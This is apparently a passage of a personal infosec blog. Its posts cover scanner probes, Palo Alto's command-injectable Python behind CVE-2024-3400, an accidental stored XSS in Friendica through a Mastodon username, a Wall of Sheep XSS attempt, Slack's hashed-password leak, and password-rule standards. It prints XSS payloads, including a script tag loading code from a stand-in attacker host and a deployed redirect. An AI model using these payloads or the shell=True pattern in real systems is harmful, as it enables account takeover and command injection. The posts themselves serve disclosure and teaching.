infosec

    I am not exaggerating this:

    I created a new hostname in DNS, then added it to my existing webserver config.

    It was online for 3 seconds – 3! – before getting a 404 request for /.git/config.

    If you’re relying on obscurity to protect your services, get that idea right out of your fool head today. You have about 3 seconds to get your act together.

    In the time it took me to type this, I got another 62 requests:

         30 "/"
          3 "/.git/config"
          2 "/.vscode/sftp.json"
          2 "/v2/_catalog"
          2 "/telescope/requests"
          2 "/server-status"
          2 "/server"
          2 "/s/431323e2230323e2134323e2239313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"
          2 "/?rest_route=/wp/v2/users/"
          2 "/login.action"
          2 "/.env"
          2 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"
          2 "/.DS_Store"
          2 "/debug/default/view?panel=config"
          2 "/config.json"
          2 "/_all_dbs"
          2 "/about"
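
    Incidentally, a tally in that shape can be pulled out of a webserver access log with a few lines of Python. This is a sketch; the sample log lines and the regex are invented to match the common combined log format, so adjust for your server:

```python
from collections import Counter
import re

# Pull the request path out of combined-format access log lines.
# Assumption: requests look like "GET /path HTTP/1.1" inside quotes.
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP')

def tally(lines):
    return Counter(m.group(1) for line in lines if (m := REQUEST.search(line)))

# Invented sample data for illustration.
log = [
    '1.2.3.4 - - [16/Apr/2024] "GET / HTTP/1.1" 200 612 "-" "-"',
    '5.6.7.8 - - [16/Apr/2024] "GET /.git/config HTTP/1.1" 404 153 "-" "-"',
    '9.9.9.9 - - [16/Apr/2024] "GET / HTTP/1.1" 200 612 "-" "-"',
]
for path, n in tally(log).most_common():
    print(f'{n:>7} "{path}"')
```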
    

    Conference tracks where more than a few people are wearing khaki:

    • Defending your AI assets
    • Defending your assets from AI
    • Defending your assets with AI

    Additional conference tracks where more than a few people have primary colored hair:

    • Prompt injection for lolz and cash

    Palo Alto's exploited Python code

    watchTowr Labs has a nice blog post dissecting CVE-2024-3400. It’s very readable. Go check it out.

    The awfulness of Palo Alto’s Python code in this snippet stood out to me:

    def some_function():
        ...
        if source_ip_str is not None and source_ip_str != "": 
            curl_cmd = "/usr/bin/curl -v -H \"Content-Type: application/octet-stream\" -X PUT \"%s\" --data-binary @%s --capath %s --interface %s" \
                         %(signedUrl, fname, capath, source_ip_str)
        else:
            curl_cmd = "/usr/bin/curl -v -H \"Content-Type: application/octet-stream\" -X PUT \"%s\" --data-binary @%s --capath %s" \
                         %(signedUrl, fname, capath)
        if dbg:
            logger.info("S2: XFILE: send_file: curl cmd: '%s'" %curl_cmd)
        stat, rsp, err, pid = pansys(curl_cmd, shell=True, timeout=250)
        ...
    
    def dosys(self, command, close_fds=True, shell=False, timeout=30, first_wait=None):
        """call shell-command and either return its output or kill it
           if it doesn't normally exit within timeout seconds"""
    
        # Define dosys specific constants here
        PANSYS_POST_SIGKILL_RETRY_COUNT = 5
    
        # how long to pause between poll-readline-readline cycles
        PANSYS_DOSYS_PAUSE = 0.1
    
        # Use first_wait if time to complete is lengthy and can be estimated 
        if first_wait == None:
            first_wait = PANSYS_DOSYS_PAUSE
    
        # restrict the maximum possible dosys timeout
        PANSYS_DOSYS_MAX_TIMEOUT = 23 * 60 * 60
        # Can support upto 2GB per stream
        out = StringIO()
        err = StringIO()
    
        try:
            if shell:
                cmd = command
            else:
                cmd = command.split()
        except AttributeError: cmd = command
    
        p = subprocess.Popen(cmd, stdout=subprocess.PIPE, bufsize=1, shell=shell,
                 stderr=subprocess.PIPE, close_fds=close_fds, universal_newlines=True)
        timer = pansys_timer(timeout, PANSYS_DOSYS_MAX_TIMEOUT)
    

    It uses string building to create a curl command line. Then it passes that command line down into a function that calls subprocess.Popen(cmd_line, shell=True). What? No! Don’t ever do that!
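
    The fix is old, boring, and built into the standard library: pass the command as a list of arguments and let subprocess execute the program directly, with no shell in between. A sketch, reusing the variable names from the snippet above:

```python
import subprocess

def build_curl_cmd(signed_url, fname, capath, source_ip_str=None):
    # Each value is its own argv element. No shell ever parses them,
    # so metacharacters in signed_url or source_ip_str can't inject
    # extra commands.
    cmd = [
        "/usr/bin/curl", "-v",
        "-H", "Content-Type: application/octet-stream",
        "-X", "PUT", signed_url,
        "--data-binary", f"@{fname}",
        "--capath", capath,
    ]
    if source_ip_str:
        cmd += ["--interface", source_ip_str]
    return cmd

def send_file(signed_url, fname, capath, source_ip_str=None):
    # shell=False is the default: the program is exec'd directly.
    return subprocess.run(
        build_curl_cmd(signed_url, fname, capath, source_ip_str),
        capture_output=True, text=True, timeout=250,
    )
```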

    I fed that code into the open source bandit static analyzer. It flagged this code with a high severity, high confidence finding:

    ᐅ bandit pan.py
    [main]  INFO    profile include tests: None
    [main]  INFO    profile exclude tests: None
    [main]  INFO    cli include tests: None
    [main]  INFO    cli exclude tests: None
    [main]  INFO    running on Python 3.12.1
    Run started:2024-04-16 17:14:52.240258
    
    Test results:
    >> Issue: [B604:any_other_function_with_shell_equals_true] Function call with shell=True parameter identified, possible security issue.
       Severity: Medium   Confidence: Low
       CWE: CWE-78 (https://cwe.mitre.org/data/definitions/78.html)
       More Info: https://bandit.readthedocs.io/en/1.7.8/plugins/b604_any_other_function_with_shell_equals_true.html
       Location: ./pan.py:14:26
    13              logger.info("S2: XFILE: send_file: curl cmd: '%s'" % curl_cmd)
    14          stat, rsp, err, pid = pansys(curl_cmd, shell=True, timeout=250)
    15
    
    --------------------------------------------------
    >> Issue: [B602:subprocess_popen_with_shell_equals_true] subprocess call with shell=True identified, security issue.
       Severity: High   Confidence: High
       CWE: CWE-78 (https://cwe.mitre.org/data/definitions/78.html)
       More Info: https://bandit.readthedocs.io/en/1.7.8/plugins/b602_subprocess_popen_with_shell_equals_true.html
       Location: ./pan.py:49:8
    48              bufsize=1,
    49              shell=shell,
    50              stderr=subprocess.PIPE,
    51              close_fds=close_fds,
    52              universal_newlines=True,
    53          )
    54          timer = pansys_timer(timeout, PANSYS_DOSYS_MAX_TIMEOUT)
    
    --------------------------------------------------
    
    Code scanned:
            Total lines of code: 41
            Total lines skipped (#nosec): 0
    
    Run metrics:
            Total issues (by severity):
                    Undefined: 0
                    Low: 0
                    Medium: 1
                    High: 1
            Total issues (by confidence):
                    Undefined: 0
                    Low: 1
                    Medium: 0
                    High: 1
    Files skipped (0):
    

    From that we can infer that Palo Alto does not use effective static analysis on their Python code. If they did, this code would not have made it to production.

    Veilid in The Washington Post

    I’ve been helping on a fun project with some incredibly brilliant friends. I found myself talking about it to a reporter at The Washington Post. The story just came out. My part was crucial, insightful, and far, far down the page:

    Once known for distributing hacking tools and shaming software companies into improving their security, a famed group of technology activists is now working to develop a system that will allow the creation of messaging and social networking apps that won’t keep hold of users’ personal data. […] “It’s a new way of combining [technologies] to work together,” said Strauser, who is the lead security architect at a digital health company.

    You bet I’m letting this go to my head.

    At work: “Kirk, I think you’re wrong.” “Well, one of us was featured in WaPo, so we’ll just admit that I’m the expert here.”

    At home: “Honey, can you take the trash out?” “People in The Washington Post can’t be expected to just…” “Take this out, ‘please’.”

    But really, Veilid is incredibly neat and I’m awed by the people I’ve been lucky to work with. Check it out after the launch next week at DEF CON 31.

    I use Things without encryption

    Update 2023-11-03: No, I don’t.


    I tell people not to use Readdle’s Spark email app. Then I turn around and use the Things task manager, which lacks end-to-end encryption (E2EE). That concerns me. I have a PKM note called “Task managers”, and under “Things” my first bullet point is:

    • Lacks end-to-end encryption

    I realize I’m being hypocritical here, but perhaps only a little bit. There’s a difference in exposure between Things and, say, my PKM notes, archive of scanned documents, email, etc.:

    I don’t put highly sensitive information in Things. No, I don’t want my actions in there to be public, but they’re generally no more detailed than “make an allergist appointment” or “ask boss about a raise”. I know some people use Things as a general note-taking app but I don’t. There are other apps more tailored to that and I use them instead.

    I control what information goes into Things. If my doctor were to email me sensitive medical test results, the Spark team could hypothetically read them. Cultured Code can only view what I personally choose to put into Things. (That glosses over the “Mail to Things” feature, but I never give that address to anyone else and I don’t worry about it being misused.)

    Things can’t impersonate me. Readdle could use my email credentials to contact my boss and pretend to be me. Now, I’m confident that they won’t. They’re a good, reputable company. But they could, and that’s enough to keep me away from Spark.

    Finally, Cultured Code is a German company covered by the GDPR. They have strong regulatory reasons not to do shady stuff with my data.

    While I don’t like that Things lacks E2EE, and I wish it had it, that shortcoming isn’t serious enough, given how I use the app, to keep me away. There are more secure alternatives like OmniFocus and Reminders, but the benefits I get from Things over those options make it worthwhile for me to hold my nose and use it.

    Everyone has to make that decision based on their own usage. If you have actions like “send government documents to reporter” or “call patient Amy Jones to tell her about her cancer”, then you shouldn’t use Things or anything else without E2EE. I’d be peeved if my Things actions were leaked, but it wouldn’t ruin my life or get me fired.

    But I know I should still look for something more secure.

    Accidentally Hacking the Planet

    Last summer I tried to hack the Wall of Sheep at DEF CON. It didn’t work. The short version is that I tried to make a Cross Site Scripting (XSS) attack against the Wall by crafting a username:

    <script type="text/javascript">alert("I was here.");</script>
    

    Because I’m kind of a smartass, I later changed my Mastodon username to something similar:

    <script>alert("Tek");</script>
    

    Then I laughed about it with my geeky friends and promptly forgot all about the joke.

    And then late at night on Mother’s Day Eve this year, some people started sending me messages like “why is your name popping up on my screen?” and “please make that stop” and “DUDE NO REALLY PLEASE STOP IT”. I had another laugh and tried to go to sleep, until I realized, oh, this isn’t good. Those people were all on various Friendica instances, and when my username came across their timeline, the server software was incorrectly embedding it in the HTML as a real <script> tag instead of displaying it as the literal text <script>alert("Tek");</script>. In the web world, that’s about as bad as an attack can get. The US government’s CVSS calculator scored it as a perfect 10.0.

    • An attacker (me, by accident, in this case) could exploit the vulnerability without having any access to those Friendica instances.
    • The attack was simple: I changed my username to a bit of valid JavaScript.
    • All I had to do to trigger the vulnerability was to get my username to show up on the victim’s screen. If I sent them a message, or if any of their friends saw and boosted my message so that it appeared in the victim’s timeline, then the trap was sprung.
    • My little joke was annoying but harmless. A malicious attacker could just as easily change their username to
    <script src="https://hackerz.ru/badstuff.js">Hi</script>
    
    • The malicious JavaScript could do literally anything with the victim’s account that the victim could do. It could look at all their private messages and upload them to another server, or change their password, or message all of their friends, or change their own username to be another bit of malicious JavaScript and start a chain reaction.
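
    The rendering-side fix is equally well-known: escape user-controlled text before embedding it in HTML. Friendica is written in PHP, but the principle is the same everywhere; here it is in a few lines of Python:

```python
from html import escape

username = '<script>alert("Tek");</script>'

# Escaping turns the markup characters into entities, so the browser
# shows the username as literal text instead of executing it.
rendered = '<span class="display-name">%s</span>' % escape(username)
print(rendered)
```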

    That wasn’t funny at all. I got up and dashed off an email to Friendica’s security email address. I also found that some of the people I’d been talking to via Mastodon were Friendica maintainers, and I messaged them with my concerns.1 Satisfied that the right people had been notified, I went back to bed.

    The next morning I told my wife and kid about the unexpected evening I’d had. My kid instantly piped up with “Dad! Dad! You should change it to a Rickroll!”2

    My jaw hit the floor. Yes, of course. It must be done. My amazing wife egged me on by insisting that as it was Mother’s Day, I owed this to her. After a little experimentation, I came up with a new username:

    <script>window.location="https://is.gd/WVZvnI#TekWasHere"</script>
    

    It was a little longer than the maximum of 30 characters that Mastodon allows you to enter, but since I have direct access to my Mastodon instance’s database, it was easy to work around that limit.

    I began receiving new messages that I’m pretty sure were all in good humor. Well, somewhat sure.

    To their vast credit, the Friendica gang pounced on the problem quickly. Some instances rolled out a preliminary fix later that day. A week later, the team published a new public release so that all other Friendica admins could patch their systems.

    It’s easy to make a mistake. That’s inevitable. The world would be better if everyone reacted like the Friendica maintainers, by asking questions, finding a solution, then quickly fixing those mistakes. Well done.


    1. Because this is how we do it, OK? It’s fine to enjoy that moment of discovery, but when you find a broken window, you let someone know so they can fix it. You don’t go in. And you never, ever use that knowledge to hurt people. ↩︎

    2. Exact quote from the conversation: “You have the ability to do the funniest thing in history!” That’s overselling it, but I appreciated their enthusiasm. ↩︎

    The Internet is a rough neighborhood

    This week I stood up a new firewall in front of my home network. This one has much better logging than the old one, and I’ve been watching the block reports.

    A screenshot of blocked inbound connection attempts, originating from all over the world.

    Real talk, friends: DO. NOT. expose a machine to the open Internet unless you’re 100% confident it’s bulletproof.

    “I run my service on a custom port!” Doesn’t matter.

    “I use IPv6!” Doesn’t matter.

    “I’m just a nobody!” Doesn’t matter.

    Practice safer networking, every time, all the time.

    Trying (and Failing) to hack the Wall of Sheep

    The Wall of Sheep is a popular exhibit at DEF CON. Participants run packet sniffers on an insecure Wi-Fi network and try to catch people logging into unencrypted websites and other services. If they see that happening, they post the person’s username and password on a giant display. It looks something like:

    Sample Wall of Sheep

    That’s an excellent reminder to be careful when you’re connected to an unknown network, and not to send your login credentials out in the open.

    From the first time I saw it, though, I had to wonder: is the wall itself hackable? Could I make it look like this instead?

    Snoop onto them, as they snoop onto us.

    The idea kept bouncing around the back of my mind until I added it to my to-do list so I could stop thinking about it. I had to at least try it.

    To do: hack the wall!

    Assumptions

    I know nothing about the Wall of Sheep’s internal workings. That’s deliberate. I wanted to test this for the fun of it, and part of the challenge was to see how far I could get without any knowledge of it. I had to make a few assumptions:

    1. If you’re connected to the right Wi-Fi network and submit credentials in plaintext, they’ll be shown on the wall.
    2. The process of getting captured credentials on the wall is automated.
    3. The wall is rendered by a web browser.
    4. The wall’s software has been around for a while and wasn’t written to be particularly secure. After all, it’s on the attacking end, right?
    5. No one’s tried this before, so no one’s fixed it before.

    Choosing the attack

    If the above assumptions are true, the obvious attack vector is Cross Site Scripting (XSS). The method is to create a snippet of JavaScript and then trick the Wall of Sheep into displaying — and executing — it. This should work:

    <script type="text/javascript">alert("I was here.");</script>
    

    But how do I get that onto the board? The password field is usually censored, such as hunter2 being masked to hunt***. That would destroy the payload, so that wouldn’t work. Is there a way to make a DNS hostname that renders correctly? Eh, maybe, but crafting that sounds like work. (Note to self: but boy, wouldn’t that wreak havoc on the web? Huh. I’ve gotta look into that.)

    However, look at that lovely login field. It’s just sitting out there in full, uncensored, plaintext glory. Jackpot! That’s where I’ll inject the JavaScript.

    Setting up a webserver

    This attack requires a webserver to send those faked credentials to. For ease of implementation, I configured HTTP Basic authentication with:

    • Username: Me<script ...
    • Password: lol

    Remember how I’ve wanted to do this for years? Guess who suddenly remembered to do it on the last day of DEF CON. Everything after this was done on my iPhone with Vim in an SSH client. This was not an ideal way to do something technical. Learn from my mistakes: failing to plan is planning to fail.

    Getting onto the DefCon-open Wi-Fi

    You brought a burner device, right? I didn’t. What could possibly go wrong connecting an off-the-shelf device to an open network at DEF CON! YOLO.

    Visiting the web page

    I logged into the page on my webserver’s bare IP address, watched the board, and… nothing. I reloaded it; nothing. I looked around to see if any of the participants looked like they might’ve found something; still nothing. Rats.

    Enlisting help

    Jan and Pat1 were participants sitting near where I was setting this up. I needed their assistance but didn’t want to outright ask for it. I started posing innocent questions to Jan: “Hey, what are you working on? What’s Wireshark?” While they kindly explained in general terms, they were understandably more interested in their own project than tutoring a passerby. Pat was more willing to teach me and I pulled up a chair to sit with them. They patiently answered my questions and pointed to interesting things on their screen. They also noticed fairly quickly that I was regularly reloading a page on my phone as I watched them. “Hey, uh, are you trying to get caught?” “Maaaaybe…” “Why?” I gave them a quick explanation of my project and they instantly bought in:

    Pat: Do you think this’ll work?
    Me: Probably not, but it’s worth a shot.
    Pat: Oh, wow. If it does, this will be legendary!

    I had a helper. Soon after, Jan noticed we were up to something, leading to one of my favorite exchanges at DEF CON:

    Jan: Are you two trying to get something up there on the board?
    Me, grinning: Yeah. It’s a JavaScript injection.
    Jan, wide-eyed: Who the hell are you?

    Thank you, Jan. I felt like a bona fide Security Researcher after that.

    Another random visitor saw us huddled and asked if we were trying to hack something. Jan looked at me, looked at the visitor, said “nope”, and looked back at me. I winked at Jan. Jan nodded back. The visitor squinted at us and walked off. Jan had my back.

    Pat and Jan were awesome. When we couldn’t capture my phone’s request, Pat asked if I happened to be on a VPN. Facepalm. Yes, I had iCloud Private Relay turned on globally.

    Social engineering a Shepherd

    After experimentation, we had usable Wireshark captures of me logging into my website. However, they weren’t being displayed on the Wall of Sheep. It turned out that my assumption was wrong: we had to demonstrate the capture to a “Shepherd” running the contest. Pat called one over. We showed them Pat’s capture, but they weren’t convinced at first. Most website logins are through a form POSTed to the server, not through HTTP Basic authentication. The Shepherd was also skeptical that the login was successful because the server was returning the default “welcome to Nginx!” page and not something personalized for the (obviously fake) username. I leaned very hard into the “innocent observer” role, asking questions like “but isn’t that what a successful capture looks like?” and “golly gee, it looks right to me. Don’t you think?” and “it looks suspicious to me, too, but couldn’t we try it and see what happens?” Our Shepherd seemed almost ready to go along with it — until they burned my plan to the ground.

    Defeat

    I asked the Shepherd how a login goes from being captured to being shown on the Wall of Sheep. Their reply doomed our fun: “I’d type it in.” Oh no. That’s not good. “Isn’t it automatic?”, I asked. The Shepherd paused to rub the bridge of their nose. “Well,” they sighed, “it was until people started sending a bunch of vile usernames and passwords and kind of ruined it2, so now we have to moderate the process.” I wasn’t giving up, though. “Could you type that username to see what happens?” “It’d just show up like that,” they replied. “Could we try it?”, I pleaded. “I mean, it’s just text. Um, that’s not a web page”, they countered.

    What.

    And then, for the first time ever, I saw a flashing cursor down in the bottom corner of the Wall of Sheep. My heart sank. “Is that Excel or something?” They grinned: “It’s just some old software we run.”

    Disaster.

    Regrouping

    That’s when I formally gave up on this attempt. If it were ever possible to hack the Wall of Sheep, it wasn’t on that day. That doesn’t mean I’m abandoning this forever, though. Next year, I’m going to make a smarter effort, by:

    • Setting this up in advance. Again, Vim over SSH on a phone sucks. I’ll have the fake login working before I leave home.
    • Getting there earlier. If the Wall of Sheep is ever going to be automated and rendered in a browser, it’ll be at the opening of DEF CON before anyone’s polluted the waters.
    • Using a more common authentication method than HTTP Basic auth, like a typical login form.
    • Making the resulting page look like I’d really logged into a legitimate service.
    • Bringing a burner device, because putting my own personal device on that specific Wi-Fi network was not the best idea I’ve ever had.

    And if Jan and Pat are around, I’m recruiting their help again.

    To do: hack the wall harder!

    1. I didn’t get anyone’s names, or their permission to describe them. Fake names are all you get. ↩︎

    2. I appreciate the irony that I’m complaining about hackers getting stuff to show up on the Wall of Sheep in a post where I’m talking about getting stuff to show up on the Wall of Sheep. The first rule of a good prank, though, is “don’t be a jackass and ruin it for everyone else”. I was going for something that I hoped the Shepherds would find amusing and wasn’t trying to get racial slurs and other vile junk to show up on a big screen. Don’t be that person. ↩︎

    Slack was broadcasting hashed passwords for 5 years

    I received an email from Slack on Thursday, 2022-08-04:

    We’re writing to let you know about a bug we recently discovered and fixed in Slack’s Shared Invite Link functionality. This feature allows users with the proper permissions to create a link that will allow anyone to join your Slack workspace; it is an alternative to inviting people one-by-one via email to become workspace members. You are receiving this email because one or more members of your workspace created and/or revoked one of these links for your workspace between April 17th, 2017 and July 17th, 2022. We’ll go into detail about this security issue below.

    Important things first, though: We have no reason to believe that anyone was able to obtain plaintext passwords for users in your workspace because of this vulnerability. However, for the sake of caution, we have reset impacted users’ Slack passwords. They will need to set a new Slack password before they can login again. A list of impacted users is below.

    [redacted]

    Now, for some technical details — feel free to skip the next two paragraphs if that doesn’t interest you. When you’re connected to Slack, we keep your client updated using a piece of technology called a websocket. This is an always-open stream of behind-the-scenes information, specific to just you and your account, that we use to push new information to your Slack client. When a new message is posted, a new file is uploaded, a new emoji reaction is added, or a new teammate joins, all of this information (plus much more!) is sent to you over a websocket. Data streamed from Slack’s servers over the websocket is processed by the Slack client apps, but often hidden from the user’s view.

    One of the hidden events we send over the websocket is a notice that a shared invite link was created or revoked. The bug we discovered was in this invite link event: along with the information about the shared invite link, we included the hashed password of the user who created or revoked the link. This information was sent over the websocket to all users of the workspace who were currently connected to Slack. The hash of a password is not the same as the password itself; it is a cryptographic technique to store data in a way that is secure, but not reversible. In other words, it is practically infeasible for your password to be derived from the hash, and no one can use the hash to log in as you. We use a technique called salting to further protect these hashes. Hashed passwords are secure, but not perfect — they are still subject to being reversed via brute force — which is why we’ve chosen to reset the passwords of everyone affected.
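
    Slack doesn’t say which algorithm they used (more on that below), but salted password hashing in general looks something like this sketch, using PBKDF2 from Python’s standard library:

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # a deliberately slow work factor for PBKDF2-HMAC-SHA256

def hash_password(password, salt=None):
    # A random per-user salt means two users with the same password still
    # get different hashes, defeating precomputed lookup tables.
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)  # constant-time compare
```

Even with salting and a slow hash, a leaked digest is still brute-forceable offline, which is exactly why Slack reset the affected passwords.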

    When your users reset their passwords we recommend selecting a complex and unique password. This is easiest to do by using a password manager to help generate and store strong, unique passwords for every service.

    If you have additional questions, or if you need our help as you investigate this issue, you can reply to this message or email us feedback@slack.com.

    We know that the security of your data is important. We deeply regret this issue and its impact on your organization.

    Sincerely, The team at Slack

    In summary, for 5 years Slack sent your hashed password to everyone in your Slack workspace every time you created (or revoked) a shared invite link.

    This email leaves a few questions unanswered:

    • How can you have a major vulnerability like this for 5 years?
    • What hashing algorithm did they use? Argon2? MD5?
    • Did they use per-user salts or one global one?
    • Where is the open, public notification of the issue?

    However, they did get one thing right: use a password manager to generate a strong, random password for every single service you use, and never, ever, under any circumstances, use the same password for more than one service. Because if you’ve invited anyone to Slack in the last 5 years, and you use the same password for Slack and your bank, I hope you’re on friendly terms with all of your coworkers.
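
    Generating a strong, random password is genuinely this small; it’s roughly what any password manager does under the hood, here using Python’s CSPRNG-backed secrets module:

```python
import secrets
import string

def generate_password(length=24):
    # secrets draws from the OS cryptographic RNG; the random module
    # would not be safe for this.
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())
```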

    Update 2022-08-06

    Slack has now posted about this on their blog.

    Do not use Readdle's Spark email app

    I’ve written before about Readdle’s Spark email client, which is popular, highly rated, and a beautifully powerful app. It’s also too dangerous to use. I recommend dropping it immediately.

    Readdle is a good, reputable company. I respect and appreciate them. However, Spark’s design is fatally flawed: to use its advanced features, your email username and password (or token — same thing) have to be stored on their servers so that they can access your email account on your behalf. That’s bad under normal circumstances, but astoundingly risky today. Readdle was founded in Ukraine and still has many Ukrainian employees. Russia is currently invading Ukraine, a sovereign country. If Russia succeeds, it could gain access to the login credentials of every one of Spark’s users. This would be catastrophic. Imagine Russia’s security agencies having full access to your work account, being able to use your personal email to reset your banking website’s password, or reading every email you’ve ever sent or received.

    Spark isn’t the only email app designed this way. I believe it’s the most popular, though, and that means its dangerous-by-design architecture is used by a lot of people. This isn’t acceptable and it can’t be fixed. If you use Spark, I strongly recommend following their instructions to delete all your data off their servers immediately, and then changing the password of every account you’d used it with.

    And when you’re done, see if their other apps look interesting to you. Risks with Spark aside, Readdle makes delightful software and could use our support right now.

    Uniquely bad identity branding

    My company has an account with a certain identity provider so we can test that our single sign-on feature works. Today one of my coworkers asked for an account with the IdP before he started working on that part of our code. I tried to create his user but got an error that the “username must be unique”. Huh. I double-checked our user list to ensure we didn’t have an account for him. We didn’t. I tried again and got the same error. That’s when I reached out to their support. They quickly replied:

    To resolve this issue, please navigate to Administration > Settings > Branding and toggle the custom branding switch to green. Then try to create a user and it should allow you!

    What. This had nothing to do with branding, and the switch in question looks like this:

    "Custom branding" checkbox

    But alright, I figured I’d try their suggestion.

    It worked.

    I suppose what likely happened was that support quickly found and fixed an issue, then gave me a switch to flip to make it feel like I was fixing something. I replied to them:

    So we couldn’t add that user (but could add other users) because we didn’t have custom branding enabled? That can’t be right.

    Their response?

    It could be possible that the same username could exist in another customer’s tenant. So, once you enable the custom branding it would only look for your tenant for a unique username. With branding currently being disabled, the system is considering all tenants.

    In short, if you click a logo to use your own theme for their site, usernames only have to be unique within your organization. If you don’t customize the site’s theme, they have to be unique across the whole identity provider. Furthermore, that uniqueness check only happens when you create a new user. If you flip the branding/namespace switch on, create an account, then flip the switch back off, the account is still active and usable even though it’s not globally unique. Even if you think that tying branding to uniqueness is a good idea — and it’s not — it doesn’t even work.
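
    For contrast, here’s what sane scoping looks like: per-tenant uniqueness enforced by the database itself, regardless of any UI toggles. The schema is hypothetical (sketched with SQLite), not anything the vendor actually runs:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE users ("
    "  tenant_id TEXT NOT NULL,"
    "  username  TEXT NOT NULL,"
    "  UNIQUE (tenant_id, username))"  # unique within a tenant, always
)
conn.execute("INSERT INTO users VALUES ('acme', 'kirk')")
conn.execute("INSERT INTO users VALUES ('globex', 'kirk')")  # other tenant: fine

duplicate_rejected = False
try:
    conn.execute("INSERT INTO users VALUES ('acme', 'kirk')")  # same tenant: nope
except sqlite3.IntegrityError:
    duplicate_rejected = True
```

The constraint can’t be toggled off by a branding setting, and it applies on every insert, not just when the moon is right.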

    That whole setup is nuts.

    Tripping on a Cracked Sidewalk

    Amazon Sidewalk is a new project which allows Amazon devices (like Alexa, Ring doorbells, etc.) with different owners to share their Internet connections. In short, your Alexa talks to your neighbor’s Alexa. If your Internet connection goes down, your neighbor’s device will relay messages for your device so that it can keep working. Similarly, if your Ring doorbell is closer to your neighbor’s Alexa than to your own WiFi router, it can send alerts to you through their Alexa.

    This is a terrible idea.

    This means that a device on your home network — a device you bought and paid for yourself — is letting other devices you don’t control borrow your Internet connection. Amazon claims to have designed this as a secure system, but people in infosec know that a new security protocol written and implemented by a single company is going to be a mess. When (not if, but when) an attacker finds a flaw in the Sidewalk protocol or the devices it runs on, two terrible scenarios seem likely:

    • However good and strong your WiFi password is, if an attacker can access your neighbor’s network, they can hack your neighbor’s Alexa and then use it to gain access to your own wireless network.
    • A braver attacker could sit outside your house with a hacked Alexa, or an app on their laptop that acts like one, and use it to connect to your Ring doorbell and then attack the other computers on your network.

    If you have any Amazon devices, I strongly recommend you follow their instructions to turn off Sidewalk immediately. Because Amazon plans to turn this on for everyone who hasn’t explicitly asked them not to, if you don’t follow those instructions, you’ll be allowing people near your home to use your WiFi. Some owners have claimed that they turned off Sidewalk but that it turned itself back on after a software update. If this happens in my home, I will literally throw our Alexas out in the trash.

    Amazon Sidewalk is a solution without a problem and a disaster in the making. Turn it off.

    Security training for the masses

    My company is going through its annual HIPAA privacy and security refresher training. This is a good thing and I wholeheartedly support it, as it’s always nice to be reminded of some of the details. “Oh, I forgot that we’re allowed to do X! That’s good to know.”

    But the most irksome thing in the world is when you know the right answer to a test question but are required to give the wrong one to pass it. For instance, we were asked:

    If you then connect with a VPN, will that ensure a file sent via email will be secure all the way through to its destination? Yes / No / Maybe

    Test says: maybe! If you change nothing about your setup except adding a VPN into the mix, you may now be able to send email securely.

    I say: The correct answer is “of course not”. Our company uses a “split tunnel” VPN, so only connections to certain services go over the VPN while the rest of our traffic goes over the open Internet. Do we need to route someone’s after-hours Netflix viewing through an encrypted connection? No thank you. But even without that, once you send an email to your own server, you have no control over what happens next. Does the recipient’s server support TLS connections? Are emails stored on that server encrypted at rest? Does their email app require TLS? Who knows! You sure won’t. So no, a VPN absolutely does not guarantee an email will be secure all the way through to its destination.

    If you encrypt the file you are emailing, will that ensure a file sent via email will be secure all the way through to its destination?

    Test says: yes! If you encrypt an email to an employee at another company, it’s guaranteed to be secure.

    I say: Maybe, sure. I’d even go so far as saying it probably will. However, for all I know the recipient’s company uses some key escrow thing that lets them decrypt and analyze all inbound mail, and Joe from IT occasionally sells the interesting ones to North Korea.

    Thing is, our particular training program is for the most part pretty decent, as far as such things go. Again, I’m glad we’re doing it. I just wish their post-training exams were a little more carefully worded.

    A standard for describing a site's password rules

    There’s no universal standard for what a valid password on a website must look like. Some sites allow you to use any four letters. Others require at least twenty characters, including at least one numeric digit and one “special character” (aka punctuation). Even when using a password manager, the process of creating a good one looks a lot like:

    • Turn the password manager’s strength settings all the way up and generate a password.
    • The website replies “passwords can’t be more than 20 characters long”.
    • Adjust the length down to twenty. Generate a new one and send it to the website.
    • The website replies “passwords may only contain the special characters ‘$_!#’”.
    • Adjust the number of symbols down to zero. Generate. Try again.
    • The website replies “passwords must contain at least two special characters”.
    • Turn the number of symbols back up to two. Click “generate” until you get a password that contains punctuation from “$”, “_”, “!”, and “#”, but nothing else. Try again.
    • …and repeat until you’ve appeased the website’s rules.

    I propose instead that websites should document their password rules in a standardized, machine-readable manner. For instance, suppose that each site hosted a file in a pre-defined location, like /.well-known/password-rules.yaml, in a format such as:

    max_length: 64
    min_length: 8
    allowed_symbols: "$#@!"
    min_symbols: 1
    min_upper: 1
    min_lower: 1
    min_digits: 1
    matches: "^[a-z]+(.*)+$"
    

    Then tools like 1Password could look for that file and tune their settings to suit. The new process for creating a password would look like:

    • Tell 1Password to generate a password for the site you’re currently looking at.
    • It fetches the rules file, interprets it, creates a password that satisfies all the requirements, and pastes it in the password field on the site.
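    Here’s a rough sketch of that generator side in Python. The rules dict mirrors the example file above; in real life the manager would fetch and parse /.well-known/password-rules.yaml from the site, and I’ve skipped the “matches” regex to keep it short:

```python
import secrets
import string

# Hard-coded for illustration; a real manager would fetch and parse
# /.well-known/password-rules.yaml from the target site. The "matches"
# regex from the example file is omitted for brevity.
rules = {
    "max_length": 64,
    "min_length": 8,
    "allowed_symbols": "$#@!",
    "min_symbols": 1,
    "min_upper": 1,
    "min_lower": 1,
    "min_digits": 1,
}

def generate_password(rules):
    # Use the longest permitted length: more characters, more entropy.
    length = rules["max_length"]
    alphabet = string.ascii_letters + string.digits + rules["allowed_symbols"]
    while True:
        candidate = "".join(secrets.choice(alphabet) for _ in range(length))
        # Retry until every minimum-count rule is satisfied. At 64
        # characters this almost always succeeds on the first draw.
        if (sum(c in rules["allowed_symbols"] for c in candidate) >= rules["min_symbols"]
                and sum(c.isupper() for c in candidate) >= rules["min_upper"]
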